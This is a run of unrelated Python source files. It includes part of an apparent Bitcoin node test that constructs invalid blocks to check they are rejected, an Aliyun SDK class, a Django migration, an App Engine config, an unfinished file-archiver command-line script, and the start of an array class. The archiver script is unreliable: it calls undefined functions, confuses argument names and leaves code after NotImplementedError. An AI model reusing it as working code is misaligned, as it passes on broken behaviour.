        assert_equal(len(b71.vtx), 4)
        assert_equal(len(b72.vtx), 3)
        assert_equal(b72.sha256, b71.sha256)

        self.move_tip(71)
        self.sync_blocks([b71], False, 16, b'bad-txns-duplicate', reconnect=True)

        self.move_tip(72)
        self.sync_blocks([b72], True)
        self.save_spendable_output()

        # Test some invalid scripts and MAX_BLOCK_SIGOPS
        #
        # -> b55 (15) -> b57 (16) -> b60 (17) -> b64 (18) -> b65 (19) -> b69 (20) -> b72 (21)
        #                                                                                    \-> b** (22)
        #

        # b73 - tx with excessive sigops that are placed after an excessively large script element.
        #       The purpose of the test is to make sure those sigops are counted.
        #
        #       script is a bytearray of size 20,526
        #
        #       bytearray[0-19,998]     : OP_CHECKSIG
        #       bytearray[19,999]       : OP_PUSHDATA4
        #       bytearray[20,000-20,003]: 521  (max_script_element_size+1, in little-endian format)
        #       bytearray[20,004-20,525]: unread data (script_element)
        #       bytearray[20,526]       : OP_CHECKSIG (this puts us over the limit)
        self.log.info("Reject a block containing too many sigops after a large script element")
        self.move_tip(72)
        b73 = self.next_block(73)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5 + 1
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS - 1] = int("4e", 16)  # OP_PUSHDATA4

        element_size = MAX_SCRIPT_ELEMENT_SIZE + 1
        a[MAX_BLOCK_SIGOPS] = element_size % 256
        a[MAX_BLOCK_SIGOPS + 1] = element_size // 256
        a[MAX_BLOCK_SIGOPS + 2] = 0
        a[MAX_BLOCK_SIGOPS + 3] = 0

        tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
        b73 = self.update_block(73, [tx])
        assert_equal(get_legacy_sigopcount_block(b73), MAX_BLOCK_SIGOPS + 1)
        self.sync_blocks([b73], False, 16, b'bad-blk-sigops', reconnect=True)

        # b74/75 - if we push an invalid script element, all prevous sigops are counted,
        #          but sigops after the element are not counted.
        #
        #       The invalid script element is that the push_data indicates that
        #       there will be a large amount of data (0xffffff bytes), but we only
        #       provide a much smaller number.  These bytes are CHECKSIGS so they would
        #       cause b75 to fail for excessive sigops, if those bytes were counted.
        #
        #       b74 fails because we put MAX_BLOCK_SIGOPS+1 before the element
        #       b75 succeeds because we put MAX_BLOCK_SIGOPS before the element
        self.log.info("Check sigops are counted correctly after an invalid script element")
        self.move_tip(72)
        b74 = self.next_block(74)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42  # total = 20,561
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS] = 0x4e
        a[MAX_BLOCK_SIGOPS + 1] = 0xfe
        a[MAX_BLOCK_SIGOPS + 2] = 0xff
        a[MAX_BLOCK_SIGOPS + 3] = 0xff
        a[MAX_BLOCK_SIGOPS + 4] = 0xff
        tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
        b74 = self.update_block(74, [tx])
        self.sync_blocks([b74], False, 16, b'bad-blk-sigops', reconnect=True)

        self.move_tip(72)
        b75 = self.next_block(75)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 42
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS - 1] = 0x4e
        a[MAX_BLOCK_SIGOPS] = 0xff
        a[MAX_BLOCK_SIGOPS + 1] = 0xff
        a[MAX_BLOCK_SIGOPS + 2] = 0xff
        a[MAX_BLOCK_SIGOPS + 3] = 0xff
        tx = self.create_and_sign_transaction(out[22], 1, CScript(a))
        b75 = self.update_block(75, [tx])
        self.sync_blocks([b75], True)
        self.save_spendable_output()

        # Check that if we push an element filled with CHECKSIGs, they are not counted
        self.move_tip(75)
        b76 = self.next_block(76)
        size = MAX_BLOCK_SIGOPS - 1 + MAX_SCRIPT_ELEMENT_SIZE + 1 + 5
        a = bytearray([OP_CHECKSIG] * size)
        a[MAX_BLOCK_SIGOPS - 1] = 0x4e  # PUSHDATA4, but leave the following bytes as just checksigs
        tx = self.create_and_sign_transaction(out[23], 1, CScript(a))
        b76 = self.update_block(76, [tx])
        self.sync_blocks([b76], True)
        self.save_spendable_output()

        # Test transaction resurrection
        #
        # -> b77 (24) -> b78 (25) -> b79 (26)
        #            \-> b80 (25) -> b81 (26) -> b82 (27)
        #
        #    b78 creates a tx, which is spent in b79. After b82, both should be in mempool
        #
        #    The tx'es must be unsigned and pass the node's mempool policy.  It is unsigned for the
        #    rather obscure reason that the Python signature code does not distinguish between
        #    Low-S and High-S values (whereas the bitcoin code has custom code which does so);
        #    as a result of which, the odds are 50% that the python code will use the right
        #    value and the transaction will be accepted into the mempool. Until we modify the
        #    test framework to support low-S signing, we are out of luck.
        #
        #    To get around this issue, we construct transactions which are not signed and which
        #    spend to OP_TRUE.  If the standard-ness rules change, this test would need to be
        #    updated.  (Perhaps to spend to a P2SH OP_TRUE script)
        self.log.info("Test transaction resurrection during a re-org")
        self.move_tip(76)
        b77 = self.next_block(77)
        tx77 = self.create_and_sign_transaction(out[24], 10 * COIN)
        b77 = self.update_block(77, [tx77])
        self.sync_blocks([b77], True)
        self.save_spendable_output()

        b78 = self.next_block(78)
        tx78 = self.create_tx(tx77, 0, 9 * COIN)
        b78 = self.update_block(78, [tx78])
        self.sync_blocks([b78], True)

        b79 = self.next_block(79)
        tx79 = self.create_tx(tx78, 0, 8 * COIN)
        b79 = self.update_block(79, [tx79])
        self.sync_blocks([b79], True)

        # mempool should be empty
        assert_equal(len(self.nodes[0].getrawmempool()), 0)

        self.move_tip(77)
        b80 = self.next_block(80, spend=out[25])
        self.sync_blocks([b80], False, request_block=False)
        self.save_spendable_output()

        b81 = self.next_block(81, spend=out[26])
        self.sync_blocks([b81], False, request_block=False)  # other chain is same length
        self.save_spendable_output()

        b82 = self.next_block(82, spend=out[27])
        self.sync_blocks([b82], True)  # now this chain is longer, triggers re-org
        self.save_spendable_output()

        # now check that tx78 and tx79 have been put back into the peer's mempool
        mempool = self.nodes[0].getrawmempool()
        assert_equal(len(mempool), 2)
        assert(tx78.hash in mempool)
        assert(tx79.hash in mempool)

        # Test invalid opcodes in dead execution paths.
        #
        #  -> b81 (26) -> b82 (27) -> b83 (28)
        #
        self.log.info("Accept a block with invalid opcodes in dead execution paths")
        b83 = self.next_block(83)
        op_codes = [OP_IF, OP_INVALIDOPCODE, OP_ELSE, OP_TRUE, OP_ENDIF]
        script = CScript(op_codes)
        tx1 = self.create_and_sign_transaction(out[28], out[28].vout[0].nValue, script)

        tx2 = self.create_and_sign_transaction(tx1, 0, CScript([OP_TRUE]))
        tx2.vin[0].scriptSig = CScript([OP_FALSE])
        tx2.rehash()

        b83 = self.update_block(83, [tx1, tx2])
        self.sync_blocks([b83], True)
        self.save_spendable_output()

        # Reorg on/off blocks that have OP_RETURN in them (and try to spend them)
        #
        #  -> b81 (26) -> b82 (27) -> b83 (28) -> b84 (29) -> b87 (30) -> b88 (31)
        #                                    \-> b85 (29) -> b86 (30)            \-> b89a (32)
        #
        self.log.info("Test re-orging blocks with OP_RETURN in them")
        b84 = self.next_block(84)
        tx1 = self.create_tx(out[29], 0, 0, CScript([OP_RETURN]))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx1.calc_sha256()
        self.sign_tx(tx1, out[29])
        tx1.rehash()
        tx2 = self.create_tx(tx1, 1, 0, CScript([OP_RETURN]))
        tx2.vout.append(CTxOut(0, CScript([OP_RETURN])))
        tx3 = self.create_tx(tx1, 2, 0, CScript([OP_RETURN]))
        tx3.vout.append(CTxOut(0, CScript([OP_TRUE])))
        tx4 = self.create_tx(tx1, 3, 0, CScript([OP_TRUE]))
        tx4.vout.append(CTxOut(0, CScript([OP_RETURN])))
        tx5 = self.create_tx(tx1, 4, 0, CScript([OP_RETURN]))

        b84 = self.update_block(84, [tx1, tx2, tx3, tx4, tx5])
        self.sync_blocks([b84], True)
        self.save_spendable_output()

        self.move_tip(83)
        b85 = self.next_block(85, spend=out[29])
        self.sync_blocks([b85], False)  # other chain is same length

        b86 = self.next_block(86, spend=out[30])
        self.sync_blocks([b86], True)

        self.move_tip(84)
        b87 = self.next_block(87, spend=out[30])
        self.sync_blocks([b87], False)  # other chain is same length
        self.save_spendable_output()

        b88 = self.next_block(88, spend=out[31])
        self.sync_blocks([b88], True)
        self.save_spendable_output()

        # trying to spend the OP_RETURN output is rejected
        b89a = self.next_block("89a", spend=out[32])
        tx = self.create_tx(tx1, 0, 0, CScript([OP_TRUE]))
        b89a = self.update_block("89a", [tx])
        self.sync_blocks([b89a], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)

        self.log.info("Test a re-org of one week's worth of blocks (1088 blocks)")

        self.move_tip(88)
        LARGE_REORG_SIZE = 1088
        blocks = []
        spend = out[32]
        for i in range(89, LARGE_REORG_SIZE + 89):
            b = self.next_block(i, spend)
            tx = CTransaction()
            script_length = MAX_BLOCK_BASE_SIZE - len(b.serialize()) - 69
            script_output = CScript([b'\x00' * script_length])
            tx.vout.append(CTxOut(0, script_output))
            tx.vin.append(CTxIn(COutPoint(b.vtx[1].sha256, 0)))
            b = self.update_block(i, [tx])
            assert_equal(len(b.serialize()), MAX_BLOCK_BASE_SIZE)
            blocks.append(b)
            self.save_spendable_output()
            spend = self.get_spendable_output()

        self.sync_blocks(blocks, True, timeout=180)
        chain1_tip = i

        # now create alt chain of same length
        self.move_tip(88)
        blocks2 = []
        for i in range(89, LARGE_REORG_SIZE + 89):
            blocks2.append(self.next_block("alt" + str(i)))
        self.sync_blocks(blocks2, False, request_block=False)

        # extend alt chain to trigger re-org
        block = self.next_block("alt" + str(chain1_tip + 1))
        self.sync_blocks([block], True, timeout=180)

        # ... and re-org back to the first chain
        self.move_tip(chain1_tip)
        block = self.next_block(chain1_tip + 1)
        self.sync_blocks([block], False, request_block=False)
        block = self.next_block(chain1_tip + 2)
        self.sync_blocks([block], True, timeout=180)

    # Helper methods
    ################

    def add_transactions_to_block(self, block, tx_list):
        [tx.rehash() for tx in tx_list]
        block.vtx.extend(tx_list)

    # this is a little handier to use than the version in blocktools.py
    def create_tx(self, spend_tx, n, value, script=CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])):
        return create_tx_with_script(spend_tx, n, amount=value, script_pub_key=script)

    # sign a transaction, using the key we know about
    # this signs input 0 in tx, which is assumed to be spending output n in spend_tx
    def sign_tx(self, tx, spend_tx):
        scriptPubKey = bytearray(spend_tx.vout[0].scriptPubKey)
        if (scriptPubKey[0] == OP_TRUE):  # an anyone-can-spend
            tx.vin[0].scriptSig = CScript()
            return
        (sighash, err) = SignatureHash(spend_tx.vout[0].scriptPubKey, tx, 0, SIGHASH_ALL)
        tx.vin[0].scriptSig = CScript([self.coinbase_key.sign(sighash) + bytes(bytearray([SIGHASH_ALL]))])

    def create_and_sign_transaction(self, spend_tx, value, script=CScript([OP_TRUE])):
        tx = self.create_tx(spend_tx, 0, value, script)
        self.sign_tx(tx, spend_tx)
        tx.rehash()
        return tx

    def next_block(self, number, spend=None, additional_coinbase_value=0, script=CScript([OP_TRUE]), solve=True):
        if self.tip is None:
            base_block_hash = self.genesis_hash
            block_time = int(time.time()) + 1
        else:
            base_block_hash = self.tip.sha256
            block_time = self.tip.nTime + 1
        # First create the coinbase
        height = self.block_heights[base_block_hash] + 1
        coinbase = create_coinbase(height, self.coinbase_pubkey)
        coinbase.vout[0].nValue += additional_coinbase_value
        coinbase.rehash()
        if spend is None:
            block = create_block(base_block_hash, coinbase, block_time)
        else:
            coinbase.vout[0].nValue += spend.vout[0].nValue - 1  # all but one satoshi to fees
            coinbase.rehash()
            block = create_block(base_block_hash, coinbase, block_time)
            tx = self.create_tx(spend, 0, 1, script)  # spend 1 satoshi
            self.sign_tx(tx, spend)
            self.add_transactions_to_block(block, [tx])
            block.hashMerkleRoot = block.calc_merkle_root()
        if solve:
            block.solve()
        self.tip = block
        self.block_heights[block.sha256] = height
        assert number not in self.blocks
        self.blocks[number] = block
        return block

    # save the current tip so it can be spent by a later block
    def save_spendable_output(self):
        self.log.debug("saving spendable output %s" % self.tip.vtx[0])
        self.spendable_outputs.append(self.tip)

    # get an output that we previously marked as spendable
    def get_spendable_output(self):
        self.log.debug("getting spendable output %s" % self.spendable_outputs[0].vtx[0])
        return self.spendable_outputs.pop(0).vtx[0]

    # move the tip back to a previous block
    def move_tip(self, number):
        self.tip = self.blocks[number]

    # adds transactions to the block and updates state
    def update_block(self, block_number, new_transactions):
        block = self.blocks[block_number]
        self.add_transactions_to_block(block, new_transactions)
        old_sha256 = block.sha256
        block.hashMerkleRoot = block.calc_merkle_root()
        block.solve()
        # Update the internal state just like in next_block
        self.tip = block
        if block.sha256 != old_sha256:
            self.block_heights[block.sha256] = self.block_heights[old_sha256]
            del self.block_heights[old_sha256]
        self.blocks[block_number] = block
        return block

    def bootstrap_p2p(self):
        """Add a P2P connection to the node.

        Helper to connect and wait for version handshake."""
        self.nodes[0].add_p2p_connection(P2PDataStore())
        # We need to wait for the initial getheaders from the peer before we
        # start populating our blockstore. If we don't, then we may run ahead
        # to the next subtest before we receive the getheaders. We'd then send
        # an INV for the next block and receive two getheaders - one for the
        # IBD and one for the INV. We'd respond to both and could get
        # unexpectedly disconnected if the DoS score for that error is 50.
        self.nodes[0].p2p.wait_for_getheaders(timeout=5)

    def reconnect_p2p(self):
        """Tear down and bootstrap the P2P connection to the node.

        The node gets disconnected several times in this test. This helper
        method reconnects the p2p and restarts the network thread."""
        self.nodes[0].disconnect_p2ps()
        self.bootstrap_p2p()

    def sync_blocks(self, blocks, success=True, reject_code=None, reject_reason=None, request_block=True, reconnect=False, timeout=60):
        """Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.

        Call with success = False if the tip shouldn't advance to the most recent block."""
        self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_code=reject_code, reject_reason=reject_reason, request_block=request_block, timeout=timeout)

        if reconnect:
            self.reconnect_p2p()

if __name__ == '__main__':
    FullBlockTest().main()

'''
Created by auto_sdk on 2015.06.23
'''
from aliyun.api.base import RestApi
class Rds20140815CheckAccountNameAvailableRequest(RestApi):
	def __init__(self,domain='rds.aliyuncs.com',port=80):
		RestApi.__init__(self,domain, port)
		self.AccountName = None
		self.DBInstanceId = None
		self.resourceOwnerAccount = None

	def getapiname(self):
		return 'rds.aliyuncs.com.CheckAccountNameAvailable.2014-08-15'

# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding field 'Idea.color'
        db.add_column(u'brainstorming_idea', 'color',
                      self.gf('django.db.models.fields.CharField')(default='', max_length=100, blank=True),
                      keep_default=False)


    def backwards(self, orm):
        # Deleting field 'Idea.color'
        db.delete_column(u'brainstorming_idea', 'color')


    models = {
        u'brainstorming.brainstorming': {
            'Meta': {'ordering': "['-created']", 'object_name': 'Brainstorming'},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'creator_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
            'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'question': ('django.db.models.fields.CharField', [], {'max_length': '200'})
        },
        u'brainstorming.brainstormingwatcher': {
            'Meta': {'ordering': "['-created']", 'unique_together': "(('brainstorming', 'email'),)", 'object_name': 'BrainstormingWatcher'},
            'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
        },
        u'brainstorming.emailverification': {
            'Meta': {'ordering': "['-created']", 'object_name': 'EmailVerification'},
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
            'id': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'})
        },
        u'brainstorming.idea': {
            'Meta': {'ordering': "['-created']", 'object_name': 'Idea'},
            'brainstorming': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['brainstorming.Brainstorming']"}),
            'color': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'creator_ip': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'creator_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'ratings': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'text': ('django.db.models.fields.TextField', [], {}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
        }
    }

    complete_apps = ['brainstorming']
import os
import webapp2

from actions import cronActions
from views import views
import secrets

SECS_PER_WEEK = 60 * 60 * 24 * 7
# Enable ctypes -> Jinja2 tracebacks
PRODUCTION_MODE = not os.environ.get(
    'SERVER_SOFTWARE', 'Development').startswith('Development')

ROOT_DIRECTORY = os.path.dirname(__file__)

if not PRODUCTION_MODE:
      from google.appengine.tools.devappserver2.python import sandbox
      sandbox._WHITE_LIST_C_MODULES += ['_ctypes', 'gestalt']
      TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'src')
else:
      TEMPLATE_DIRECTORY = os.path.join(ROOT_DIRECTORY, 'dist')

curr_path = os.path.abspath(os.path.dirname(__file__))


config = {
      'webapp2_extras.sessions': {
            'secret_key': secrets.COOKIE_KEY,
            'session_max_age': SECS_PER_WEEK,
            'cookie_args': {'max_age': SECS_PER_WEEK},
            'cookie_name': 'echo_sense_session'
      },
      'webapp2_extras.jinja2': {
            'template_path': TEMPLATE_DIRECTORY
    }
}

app = webapp2.WSGIApplication(
    [
      # Cron jobs (see cron.yaml)
      webapp2.Route('/cron/monthly', handler=cronActions.Monthly),
      webapp2.Route(r'/<:.*>', handler=views.ActionPotentialApp, name="ActionPotentialApp"),
    ], debug=True, config=config)

# this is the interface for `python archiver`

import archiver
import appdirs
import os
import sys
import pickle
import json

from archiver.archiver import Archiver
from archiver.parser import parseArgs

args = parseArgs()

from edit import edit 


# ==============================================

print args

# TODO: see http://stackoverflow.com/questions/13168083/python-raw-input-replacement-that-uses-a-configurable-text-editor

#-- import pdb 
#-- pdb.set_trace()

# ------------------------------------------------------------
# load the user data
# ------------------------------------------------------------

# get the user data directory
user_data_dir = appdirs.user_data_dir('FileArchiver', 'jdthorpe')
if not os.path.exists(user_data_dir) :
    os.makedirs(user_data_dir)

# LOAD THE INDEX NAMES AND ACTIVE INDEX
indexes_path = os.path.join(user_data_dir,'INDEXES.json')
if os.path.exists(indexes_path):
    with open(indexes_path,'rb') as fh:
        indexes = json.load(fh)
else:
    indexes= {'active':None,'names':[]}
    if not os.path.exists(user_data_dir):
        os.makedirs(user_data_dir)

def dumpIndexes():
    with open(indexes_path,'wb') as fh:
        json.dump(indexes,fh)

# ------------------------------------------------------------
# ------------------------------------------------------------

def getActiveName():
    # ACTIVE INDEX NUMER
    activeIndex = indexes['active']
    if activeIndex is None:
        print "No active index.  Use 'list -i' to list available indexies and 'use' to set an active index."
        sys.exit()

    # GET THE NAME OF THE INDEX
    try:
        activeIndexName = indexes['names'][indexes['active']]
    except:
        print "Invalid index number"
        sys.exit()
    return activeIndexName

# ------------------------------------------------------------
# READ-WRITE UTILITY FUNCTIONS
# ------------------------------------------------------------

# TODO: catch specific excepitons:
#        except IOError:
#            # no such file
#        except ValueError as e:
#            # invalid json file

def readSettings(name):
    """ A utility function which loads the index settings from file
    """
    try:
        with open(os.path.join(user_data_dir,name+".settings"),'rb') as fh:
            settings = json.load(fh)
    except Exception as e:
        print "Error reading index settings"
        import pdb
        pdb.set_trace()
        sys.exit()
    return settings

def readData(name):
    """ A utility function which loads the index data from file
    """
    try:
        with open(os.path.join(user_data_dir,name+".data"),'rb') as fh: data = pickle.load(fh)
    except Exception as e:
        print "Error reading index data"
        import pdb
        pdb.set_trace()
        sys.exit()
    return data

def dumpSettings(settings,name):
    """ A utility function which saves the index settings to file
    """
    try:
        with open(os.path.join(user_data_dir,name+".settings"),'wb') as fh: 
            json.dump(settings,fh)
    except Exception as e:
        print "Error writing index settings"
        import pdb
        pdb.set_trace()
        sys.exit()

def dumpData(data,name):
    """ A utility function which saves the index settings to file
    """
    try:
        with open(os.path.join(user_data_dir,name+".data"),'wb') as fh:
            pickle.dump(data,fh)
    except:
        print "Error writing index data"
        import pdb
        pdb.set_trace()
        sys.exit()


# ------------------------------------------------------------
# ------------------------------------------------------------

if args.command == 'add':

    activeName = getActiveName()
    settings = readSettings(activeName)

    if args.source is not None:

        source = os.path.abspath(args.source)

        if not os.path.exists(source):
            print 'WARNING: no such directory "%s"'%(source)
        elif not os.path.isdir(source):
            print 'ERROR: "%s" is not a directory'%(source)
            sys.exit()

        print 'Adding source directory: %s'%(source)
        if not any(samefile(source,f) for f in settings['sourceDirectories']):
            settings['sourceDirectories'].append(source)

    elif args.exclusions is not None:

        import re
        try:
            re.compile(args.exclusion)
        except re.error:
            print 'Invalid regular expression "%s"'%(args.exclusion)
            sys.exit()
            
        if args.noic:
            settings['directoryExclusionPatterns'].append(args.exclusion)
        else:
            settings['directoryExclusionPatterns'].append((args.exclusion,2)) # re.I == 2

    elif args.archive is not None:

        raise NotImplementedError
        if settings['archiveDirectory'] is not None:
            print "Archive path has already been set use 'remove' to delete the archive path before setting a new archive path" 

        archiveDirectory = os.path.abspath(args.archive)
        if not os.path.exists(archiveDirectory):
            if args.create :
                os.makedirs(archiveDirectory)
            else:
                print 'ERROR: no such directory "%s"'%(archiveDirectory)
                sys.exit()
        elif not os.path.isdir(archiveDirectory):
            print '"%s" is not a directory'%(archiveDirectory)
            sys.exit()

        print 'Setting archive directory to: %s'%(archiveDirectory)
        settings['archiveDirectory'] = args.archive

    else:
        raise NotImplementedError
        print 'Error in Arg Parser'
        sys.exit()

    dumpSettings(settings,activeName)

elif args.command == 'list':

    if args.sources:

        for f in readSettings(getActiveName())['sourceDirectories']:
            print f

    elif args.exclusions:

        for f in readSettings(getActiveName())['directoryExclusionPatterns']:
            print f

    elif args.archive:

        print readSettings(getActiveName())['archiveDirectory']

    elif args.files:

        archiver = Archiver()
        archiver.data = readData(getActiveName())
        for f in archiver:
            print f

    elif args.indexes:

        print 'Active Index: %s (*)'%(getActiveName())
        print 'Index Names: '
        for i,name in enumerate(indexes['names']):
            print ' %s  %i: %s'%(
                    (' ','*')[(i == indexes['active'])+0],
                    i+1,
                    name,
                    )

    else:

        print 'Error in Arg Parser'

elif args.command == 'remove':

    activeName = getActiveName()
    settings = readSettings(activeName)

    if args.source is not None:

        if not (1 <= args.source <= len(settings['sourceDirectories'])):
            print 'Invalid index %i'%(args.source)

        del settings['sourceDirectories'][args.source - 1]

    elif args.exclusion is not None:

        raise NotImplementedError
        if not (1 <= args.exclusion <= len(settings['directoryExclusionPatterns'])):
            print 'Invalid index %i'%(args.exclusion)

        del settings['directoryExclusionPatterns'][args.exclusion - 1]

    elif args.archive is not None:

        raise NotImplementedError
        settings['archiveDirectory'] = None

    else:

        raise NotImplementedError
        print 'Error in Arg Parser'
        sys.exit()

    dumpSettings(settings,activeName)

elif args.command == 'update':

    activeName = getActiveName()
    settings = readSettings(activeName)
    if not len(settings['sourceDirectories']):
        print "Error: no source directories in the active index. Please add a source directory via 'add -s'"
    archiver = Archiver(
            settings = readSettings(activeName),
            data = readData(activeName))
    archiver.update()
    dumpSettings(archiver.settings,activeName)
    dumpData(archiver.data,activeName)

elif args.command == 'clean':

    raise NotImplementedError
    activeName = getActiveName()
    archiver = Archiver(
            settings = readSettings(activeName),
            data = readData(activeName))
    archiver.clean()
    dumpSettings(archiver.settings,activeName)
    dumpData(archiver.data,activeName)

elif args.command == 'copy':

    raise NotImplementedError
    activeName = getActiveName()
    settings = readSettings(activeName),
    if settings['archiveDirectory'] is None:
        print "ERROR Archive directory not set.  Use 'add -a' to set the archive directory."
        sys.exit()

    Index(
            settings = settings,
            data = readData(activeName)).copy()

elif args.command == 'diskimages':

    raise NotImplementedError
    if args.size is None or args.size == "DVD":
        size = 4.65*1<<20
    elif args.size == "CD":
        size = 645*1<<20
    elif args.size == "DVD":
        size = 4.65*1<<20
    elif args.size == "DVD-dual":
        size = 8.5*1<<30
    elif args.size == "BD":
        size = 25*1<<30
    elif args.size == "BD-dual":
        size = 50*1<<30
    elif args.size == "BD-tripple":
        size = 75*1<<30
    elif args.size == "BD-xl":
        size = 100*1<<30
    else:
        try:
            size = int(float(args.size))
        except:
            print 'ERROR: unable to coerce "%s" to float or int'%(args.size)
            sys.exit()

    activeName = getActiveName()
    settings = readSettings(activeName),

    # GET THE DIRECTORY ARGUMENT
    if args.directory is not None:
        directory = args.directory
    else:
        if settings['archiveDirectory'] is None:
            print "ERROR Archive directory not set and no directory specified.  Use 'diskimages -d' to specifiy the disk image directory or 'add -a' to set the archive directory."
            sys.exit()
        else: 
            directory = os.path.join(settings['archiveDirectory'],'Disk Images')

    # VALIDATE THE DIRECTORY 
    if not os.path.exists(directory):
        if args.create :
            os.makedirs(directory)
        else:
            print 'ERROR: no such directory "%s"'%(directory)
            sys.exit()
    elif not os.path.isdir(directory):
        print '"%s" is not a directory'%(directory)
        sys.exit()

    # get the FPBF argument
    if args.fpbf is not None:
        FPBF = True
    elif args.nofpbf is not None:
        FPBF = False
    else:
        FPBF = sys.platform == 'darwin'

    Index( settings = settings,
            data = readData(activeName)).diskimages(directory,size,FPBF)

elif args.command == 'settings':

    activeName = getActiveName()
    if args.export is not None:

        raise NotImplementedError
        with open(args.export,'rb') as fh:
            json.dump(readSettings(activeName),fh,indent=2,separators=(',', ': '))

    elif args.load is not None:

        raise NotImplementedError
        with open(args.export,'wb') as fh:
            settings = json.load(fh)
        # give a chance for the settings to be validated
        try:
            archiver = Archiver(settings=settings)
        except:
            print "ERROR: invalid settings file"

        dumpSettings(archiver.settings,args.name)

    elif args.edit is not None:

        settings = readSettings(activeName)
        old = settings['identifierSettings'][args.edit]
        new = edit(json.dumps(old,indent=2,separators=(',', ': ')))
        settings['identifierSettings'][args.edit]= json.loads(new)
        dumpSettings(settings,activeName)

    else :

        print json.dumps(readSettings(activeName),indent=2,separators=(',', ': '))

elif args.command == 'create':

    if args.name in indexes['names']:
        print "An index by the name '%s' already exists"%(args.name)
        sys.exit()

    import re
    validater = re.compile(r'^[-() _a-zA-Z0-9](?:[-() _.a-zA-Z0-9]+[-() _a-zA-Z0-9])$')
    if validater.match(args.name) is None:
        print "ERROR: names must be composed of letters, numbers, hypen, underscore, space and dot charactes an not end or begin with a dot"
        sys.exit()

    archiver = Index()

    dumpSettings(archiver.settings,args.name)
    dumpData(archiver.data,args.name)

    indexes['names'].append(args.name)

    dumpIndexes()

    # TODO: check if there are no other indexies.  if so, make the new one active.
    print "Created index '%s'"%(args.name)

elif args.command == 'save':

    raise NotImplementedError
    Index( settings = readSettings(getActiveName()),
            data = readData(getActiveName())).save(args.filename)


elif args.command == 'use':

    print indexes['names']
    if not args.name in indexes['names']:
        print "ERROR: No such index named '%s'"%(args.name)
        sys.exit()

    indexes['active'] =indexes['names'].index(args.name) 

    dumpIndexes()

elif args.command == 'delete':

    if not args.name in indexes['names']:
        print "ERROR: No such index named '%s'"%(args.name)
        sys.exit()

    nameIindex = indexes['names'].index(args.name)

    if indexes['active'] == nameIindex:
        print 'WARNING: deleting active index'
        indexes['active'] = None

    del indexes['names'][nameIindex]

    dumpIndexes()

else :

    print "unknown command %s"%(args.command)




"""
.. module:: mlpy.auxiliary.datastructs
   :platform: Unix, Windows
   :synopsis: Provides data structure implementations.

.. moduleauthor:: Astrid Jackson <ajackson@eecs.ucf.edu>
"""
from __future__ import division, print_function, absolute_import

import heapq
import numpy as np

from abc import ABCMeta, abstractmethod


class Array(object):
    """The managed array class.

    The managed array class pre-allocates memory to the given size
    automatically resizing as needed.

    Parameters
    ----------
    size : int
        The size of the array.

    Examples
    --------
    >>> a = Array(5)
    >>> a[0] = 3
    >>> a[1] = 6

    Retrieving an elements:

    >>> a[0]
    3
    >>> a[2]
    0

    Finding the length of the array:

    >>> len(a)
    2

    """
    def __init__(self, size):
        self._data = np.zeros((size,))
        self._capacity = size
        self._size = 0

    def __setitem__(self, index, value):
        """Set the the array at the index to the given value.

        Parameters
        ----------
        index : int
            The index into the array.
        value :
            The value to set the array to.

        """
        if index >= self._size:
            if self._size == self._capacity:
                self._capacity *= 2
                new_data = np.zeros((self._capacity,))
                new_data[:self._size] = self._data
                self._data = new_data

            self._size += 1

        self._data[index] = value

